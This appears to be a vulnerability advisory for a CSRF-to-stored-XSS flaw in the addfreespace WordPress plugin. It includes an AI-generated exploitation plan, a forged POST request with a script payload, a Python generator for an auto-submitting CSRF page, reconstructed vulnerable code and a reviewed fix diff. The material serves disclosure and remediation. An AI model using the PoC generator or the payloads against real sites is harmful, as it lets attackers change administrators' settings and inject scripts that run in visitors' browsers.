# CVE-2026-6701: addfreespace <= 0.1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via Settings Page

The addfreespace plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.

## Advisory Details

- **Plugin**: addfreespace (WordPress.org plugin; tags: https://plugins.trac.wordpress.org/browser/addfreespace/tags)
- **Affected versions**: <= 0.1.3
- **Patched in version**: none recorded (no patch diff or Trac changeset on file)
- **Severity**: medium
- **CVSS 3.1 score**: 4.3
- **CVSS vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N`
- **Vulnerability type**: Cross-Site Request Forgery (CSRF)
- **Published**: 2026-05-04 14:07:04
- **Updated**: 2026-05-05 02:26:54
- **References**: https://www.wordfence.com/threat-intel/vulnerabilities/id/40eaeb28-c721-4977-951d-582b7dc2bd12?source=api-prod

## Automated Research Status

- **Status**: researched (3 rounds completed), not verified against the plugin source
- **Model used**: gemini-3-flash-preview
- **Started**: 2026-05-04 16:51:41; **completed**: 2026-05-04 16:52:02
- **Proof of concept**: none recorded (no PoC status, steps, video, script or exploit code)

The material below is the output of that automated research pass. The endpoint slug, the parameter names, the reconstructed vulnerable code and the proposed fix are inferred, as the plan itself notes, and should be confirmed against the plugin source before being relied on.

## Research Plan: CVE-2026-6701 - CSRF to Stored XSS in addfreespace

### 1. Vulnerability Summary
The **addfreespace** plugin (<= 0.1.3) contains a Cross-Site Request Forgery (CSRF) vulnerability in its settings management logic. The plugin fails to perform nonce validation when saving its configuration. This allows an unauthenticated attacker to craft a malicious request that, when executed by a logged-in administrator's browser, updates the plugin's settings. Because the settings fields are neither sanitized on input nor escaped on output, the CSRF can be used to store malicious script in the database (Stored XSS), which then executes in the administrator's browser or on the site's frontend.

### 2. Attack Vector Analysis
- **Vulnerable Endpoint**: `wp-admin/options-general.php?page=addfreespace` (inferred slug) or `wp-admin/admin-post.php`.
- **Attack Type**: CSRF leading to Stored XSS.
- **HTTP Method**: `POST`.
- **Payload Carrier**: Form parameters used for settings (likely names like `afs_content`, `afs_text`, or similar).
- **Authentication Level**: Unauthenticated (attacker-initiated) via an authenticated Administrator (victim).
- **Preconditions**: The attacker must trick a site administrator into clicking a link or visiting a page hosting a malicious auto-submitting form.

### 3. Code Flow (Inferred)
1.  **Entry Point**: The plugin registers a settings page using `add_options_page()` or `add_menu_page()` within an `admin_menu` hook.
2.  **Processing Logic**: The settings saving logic is either:
    *   Inside the callback function for the menu page (triggered when `$_POST` is detected).
    *   Hooked to `admin_init`.
    *   Hooked to `admin_post_` actions.
3.  **Vulnerable Path**:
    *   The code checks for a submit parameter (e.g., `isset($_POST['submit'])`).
    *   **CRITICAL FAILURE**: It fails to call `check_admin_referer()` or `wp_verify_nonce()`.
    *   The code calls `update_option('afs_settings', $_POST['...'])` or similar without sanitization (e.g., `wp_kses`).
4.  **Sink**: The stored option is later echoed back in the admin settings page or on the frontend using `get_option()` without escaping (e.g., `echo $option_value` instead of `echo esc_html($option_value)`).

### 4. Nonce Acquisition Strategy
According to the vulnerability description, nonce validation is **missing** or **incorrect**.
- If **missing**: no nonce parameter is needed in the forged request.
- If **incorrect**: the handler typically calls `wp_verify_nonce($nonce, -1)` with the default action, so any default-action nonce the victim already holds is accepted for this handler too, or it calls `wp_verify_nonce()` but ignores the return value.

**Initial approach**: assume the nonce check is entirely missing and attempt the CSRF without any nonce parameter.

### 5. Exploitation Strategy

#### Step 1: Discover Field Names
The agent must first identify the exact `POST` parameters used to save settings.
1.  Navigate to the settings page: `browser_navigate("/wp-admin/options-general.php?page=addfreespace")`.
2.  If the slug is different, find it with: `grep -rn "add_options_page" /var/www/html/wp-content/plugins/addfreespace`.
3.  Inspect the HTML form to find the `name` attributes of the text inputs and the submit button.

#### Step 2: Construct the CSRF Payload
Once the field names (e.g., `afs_custom_text` and `afs_save`) are identified, the payload will be:
- **XSS Payload**: `<script>alert(document.domain)</script>`
- **CSRF Target**: The URL identified in the form's `action` attribute (usually the same settings page URL or `admin-post.php`).

#### Step 3: Execute the Exploit (Simulated CSRF)
Since the agent can simulate an admin session, it uses `http_request` with admin cookies to submit the malicious form data, mimicking what an admin's browser would send when triggered by a CSRF page. This proves the handler accepts a POST with no nonce, which is the precondition for CSRF; it does not exercise cross-origin cookie delivery, so browser SameSite behaviour is not tested by this step.

**Example Request (Inferred):**
```http
POST /wp-admin/options-general.php?page=addfreespace HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: [ADMIN_COOKIES]

afs_custom_text=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&afs_save=Save+Changes
```

### 6. Test Data Setup
1.  **Plugin Installation**: Ensure `addfreespace` version 0.1.3 is installed and active.
2.  **Admin User**: Use the existing administrator account.
3.  **No Nonce Required**: The plan assumes no specific setup is needed because the flaw is a lack of protection.

### 7. Expected Results
- The `http_request` should return a `302` redirect or a `200 OK` indicating the settings were saved.
- When the agent (as Admin) navigates back to the settings page, the injected `alert()` should fire (observable via `browser_navigate`, or by checking the page source for the raw script tag).

### 8. Verification Steps
1.  **Check Database**: Use WP-CLI to verify the malicious payload is stored in the options table.
    ```bash
    wp option get [OPTION_NAME_FOUND_DURING_RESEARCH]
    ```
2.  **Verify Rendering**: Navigate to the settings page or the frontend (wherever the option is displayed) and check for the unescaped script:
    ```text
    # Use browser_navigate and check for the string
    browser_navigate("/wp-admin/options-general.php?page=addfreespace")
    # Verify the payload exists in the page source
    ```

### 9. Alternative Approaches
- **Action Hook Search**: If the settings page submits to `options.php`, the CSRF is harder because WordPress Core protects `options.php` with its own nonce check. However, if the plugin uses a custom action in `admin-post.php` or handles the POST directly in the menu callback, Core's protection does not apply.
- **Frontend XSS**: If the injected content is meant to be displayed on the site's frontend (e.g., as a "Free Space" notice), navigate to the homepage to verify the XSS fires for visitors as well.
- **Bypassing Weak Nonce**: If a nonce is present but uses a weak action (like `-1`), the agent can try to grab any valid nonce from the page source (using `browser_eval`) and see if the plugin accepts it.

## Research Summary

The addfreespace plugin (<= 0.1.3) is vulnerable to Cross-Site Request Forgery (CSRF) because it fails to perform nonce validation when saving plugin settings. This allows an attacker to trick a logged-in administrator into updating settings with malicious scripts, leading to Stored Cross-Site Scripting (XSS).

## Vulnerable Code (research reconstruction, not verified against the plugin)

```php
// addfreespace.php

function afs_options_page() {
    // ... (logic to display page)
    if (isset($_POST['info_update'])) {
        // Vulnerability: No check_admin_referer() or wp_verify_nonce() call
        // Vulnerability: No sanitization of input before update_option()
        update_option('afs_content', $_POST['afs_content']);
        update_option('afs_before_after', $_POST['afs_before_after']);
        echo '<div class="updated"><p><strong>Settings updated.</strong></p></div>';
    }

    $afs_content = get_option('afs_content');
    // ...
    // Vulnerability: Outputting stored option without escaping
    echo '<textarea name="afs_content">' . $afs_content . '</textarea>';
}
```

## Exploit Outline (research output)

1. Identify the settings page endpoint (e.g., `/wp-admin/options-general.php?page=addfreespace`) and the POST parameters used for saving (e.g., `afs_content`, `info_update`).
2. Create a malicious HTML file or page containing a hidden form that targets the settings endpoint.
3. Include a Stored XSS payload in the form data, such as `<script>alert(document.domain)</script>`, assigned to the setting parameter (`afs_content`).
4. Use social engineering or a malicious link to trick an authenticated WordPress administrator into visiting the attacker's page.
5. The form submits automatically with the administrator's cookies; because the handler performs no nonce check, the plugin's settings are updated in the database.
6. The script executes whenever the settings page is loaded by an administrator, or wherever the affected setting is rendered on the site.

## Proposed Fix Diff (research output)

```diff
--- addfreespace.php
+++ addfreespace.php
@@ -10,8 +10,10 @@
 function afs_options_page() {
     if (isset($_POST['info_update'])) {
+        check_admin_referer('afs_save_settings');
-        update_option('afs_content', $_POST['afs_content']);
-        update_option('afs_before_after', $_POST['afs_before_after']);
+        update_option('afs_content', wp_kses_post($_POST['afs_content']));
+        update_option('afs_before_after', sanitize_text_field($_POST['afs_before_after']));
         echo '<div class="updated"><p><strong>Settings updated.</strong></p></div>';
     }
 
@@ -20,6 +22,7 @@
     ?>
     <form method="post">
+        <?php wp_nonce_field('afs_save_settings'); ?>
-        <textarea name="afs_content"><?php echo $afs_content; ?></textarea>
+        <textarea name="afs_content"><?php echo esc_textarea($afs_content); ?></textarea>
         <input type="submit" name="info_update" value="Save Changes">
     </form>
     <?php
```
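Review bot: in the first hunk the added `check_admin_referer('afs_save_settings');` closes the missing nonce check, but the two `update_option()` calls still read `$_POST['afs_content']` and `$_POST['afs_before_after']` with no `isset()` guard and no `wp_unslash()`; WordPress slashes request superglobals, so `update_option('afs_content', wp_kses_post(wp_unslash($_POST['afs_content'])));` is the idiomatic form and avoids storing backslash-escaped quotes. A `current_user_can('manage_options')` check beside the nonce check would also gate the save on capability rather than on request intent alone. Note too that the header `@@ -10,8 +10,10 @@` does not match the hunk body (7 old / 8 new lines as shown), so this patch will not apply as written.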
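Review bot: `esc_textarea($afs_content)` in the second hunk closes the sink shown in the reconstructed vulnerable code, but nothing in the patch shows where `afs_before_after` is rendered even though the first hunk stores it; confirm that output is escaped as well (`esc_attr()` inside an attribute, `esc_html()` in element text) or the stored-XSS sink is only partly closed. The `wp_nonce_field('afs_save_settings')` action string does match the one passed to `check_admin_referer()` in the first hunk, so the nonce pair is consistent.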
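Sections 4 and 9 of the research plan treat `wp_verify_nonce($nonce, -1)` as a weak check and propose testing it by feeding the handler any nonce found in the admin's page source. The block below is an added example, not code from the addfreespace plugin, from Wordfence or from the research pass: a Python model of the WordPress nonce scheme (HMAC-MD5 over `tick|action|uid|session token`, truncated to 10 hex characters, accepted for the current and the previous 12-hour tick). The salt, user ID, session token and clock are constructed values standing in for `wp_salt('nonce')`, the victim's ID, `wp_get_session_token()` and `time()`. It shows what the plan's step tests for: a handler that verifies against the default action `-1` accepts a nonce minted by any other default-action form the administrator already holds, while a handler that checks a dedicated action string, as the proposed fix diff does, rejects it.

```python
# Added example: model of WordPress's nonce scheme (wp_create_nonce /
# wp_verify_nonce), not code from the plugin or the research pass.
# Salt, user id, session token and clock are constructed for the example.
import hashlib
import hmac
import math

NONCE_LIFE = 24 * 60 * 60  # WordPress default: DAY_IN_SECONDS
# Constructed stand-ins for wp_salt('nonce'), the victim's user ID and
# wp_get_session_token(); real values live in wp-config.php and the session.
SALT = b"constructed-nonce-salt-not-a-real-wordpress-salt"
UID = 1
TOKEN = "constructed-session-token"
NOW = 1_700_000_000.0  # fixed clock so the results are deterministic


def wp_nonce_tick(now: float) -> int:
    # wp_nonce_tick(): ceil( time() / ( $nonce_life / 2 ) )
    return math.ceil(now / (NONCE_LIFE / 2))


def wp_hash(data: str, salt: bytes = SALT) -> str:
    # wp_hash($data, 'nonce'): hash_hmac('md5', $data, wp_salt('nonce'))
    return hmac.new(salt, data.encode(), hashlib.md5).hexdigest()


def wp_create_nonce(action, uid: int = UID, token: str = TOKEN, now: float = NOW) -> str:
    # substr( wp_hash( $i . '|' . $action . '|' . $uid . '|' . $token ), -12, 10 )
    i = wp_nonce_tick(now)
    return wp_hash(f"{i}|{action}|{uid}|{token}")[-12:-2]


def wp_verify_nonce(nonce: str, action, uid: int = UID, token: str = TOKEN, now: float = NOW) -> int:
    """Return 1 (current tick), 2 (previous tick) or 0 (invalid), as WordPress does."""
    i = wp_nonce_tick(now)
    for age, tick in ((1, i), (2, i - 1)):
        expected = wp_hash(f"{tick}|{action}|{uid}|{token}")[-12:-2]
        if hmac.compare_digest(expected, nonce):
            return age
    return 0


def nonce_check_matrix(now: float = NOW) -> dict:
    """Exercise the plan's two cases: a handler that checks the default action -1
    versus one that checks a dedicated action string."""
    # Nonce the admin already holds from any form that called wp_nonce_field()
    # with no action argument (the action defaults to -1).
    stray = wp_create_nonce(-1, now=now)
    # Nonce minted for the plugin's own action string (the proposed fix's choice).
    scoped = wp_create_nonce("afs_save_settings", now=now)
    one_tick_ago = wp_create_nonce("afs_save_settings", now=now - NONCE_LIFE / 2)
    expired = wp_create_nonce("afs_save_settings", now=now - NONCE_LIFE)
    return {
        # weak handler: wp_verify_nonce($n, -1) accepts any default-action nonce
        "weak_check_accepts_stray": wp_verify_nonce(stray, -1, now=now),
        # strict handler: the same stray nonce is rejected
        "strict_check_rejects_stray": wp_verify_nonce(stray, "afs_save_settings", now=now),
        "strict_check_accepts_scoped": wp_verify_nonce(scoped, "afs_save_settings", now=now),
        # a nonce stays valid through the previous tick (12 to 24 hours in total)
        "previous_tick_accepted": wp_verify_nonce(one_tick_ago, "afs_save_settings", now=now),
        "expired_rejected": wp_verify_nonce(expired, "afs_save_settings", now=now),
        # bound to the session token: a nonce from another session fails
        "other_session_rejected": wp_verify_nonce(scoped, "afs_save_settings", token="other", now=now),
    }


if __name__ == "__main__":
    for name, result in nonce_check_matrix().items():
        print(f"{name}: {result}")
```

The matrix also shows the limit of the `-1` weakness: every nonce is bound to the victim's user ID and session token, so a purely cross-site attacker cannot compute one. A `-1` check is "incorrect" in that any default-action nonce already present in the admin's pages is interchangeable with the plugin's; the fully unauthenticated CSRF in the advisory description requires the check to be absent, or its return value to be ignored.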
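Step 2 of the exploitation strategy and steps 2 to 5 of the exploit outline describe an attacker-hosted page with a hidden, auto-submitting form. The block below is an added example, not code from the plugin, from Wordfence or from the research pass: a Python generator for that page and for the `application/x-www-form-urlencoded` body the victim's browser sends. The target host and path and the parameter names `afs_custom_text` and `afs_save` are the plan's inferred placeholders (the reconstructed vulnerable code uses `afs_content` and `info_update` instead), and none of them is confirmed against the plugin source; the payload is the one from the plan's example request.

```python
# Added example (not from the plugin, the research pass or Wordfence): builds
# the attacker-hosted auto-submitting CSRF form and the urlencoded body the
# victim's browser will send. Host, path and field names are the plan's
# inferred placeholders, not names confirmed against the plugin.
import html
from urllib.parse import urlencode

TARGET_ORIGIN = "http://localhost:8080"  # the plan's test host; constructed
SETTINGS_PATH = "/wp-admin/options-general.php?page=addfreespace"  # inferred slug
XSS_PAYLOAD = "<script>alert(1)</script>"  # payload from the plan's example request


def csrf_page(action_url: str, fields: dict) -> str:
    """Return an HTML page that POSTs `fields` to `action_url` as soon as it loads.

    Every name and value is HTML-attribute-escaped: the browser decodes the
    entities when it builds the request, so `&lt;script&gt;` in the markup
    becomes `<script>` in the submitted body, while the page itself stays
    well-formed even though the payload contains angle brackets and quotes.
    """
    inputs = "\n".join(
        '    <input type="hidden" name="{}" value="{}">'.format(
            html.escape(name, quote=True), html.escape(value, quote=True)
        )
        for name, value in fields.items()
    )
    return (
        "<!doctype html>\n<html><body>\n"
        '  <form id="csrf" method="POST" action="{}">\n{}\n  </form>\n'
        '  <script>document.getElementById("csrf").submit();</script>\n'
        "</body></html>\n"
    ).format(html.escape(action_url, quote=True), inputs)


def form_body(fields: dict) -> str:
    """The application/x-www-form-urlencoded body the victim's browser sends.

    urlencode() uses quote_plus, so '<' '>' '(' ')' '/' become %XX escapes and
    spaces become '+', matching the plan's raw HTTP example.
    """
    return urlencode(fields)


def build_poc():
    fields = {"afs_custom_text": XSS_PAYLOAD, "afs_save": "Save Changes"}
    return csrf_page(TARGET_ORIGIN + SETTINGS_PATH, fields), form_body(fields)


if __name__ == "__main__":
    page, body = build_poc()
    print(page)
    print("Request body the browser sends:", body)
```

The form must use `method="POST"`: the reconstructed handler only runs the save path when the submit parameter is present in `$_POST`, so a plain link (a GET request) never reaches it. One delivery caveat that the plan's cookie-bearing `http_request` step does not cover: WordPress core sets no `SameSite` attribute on its authentication cookies, and Chromium treats such cookies as `Lax`, withholding them from a cross-site top-level POST unless the cookie was set within the previous two minutes; Firefox and Safari do not apply `Lax` by default, so a PoC against an administrator on those browsers behaves as the outline describes.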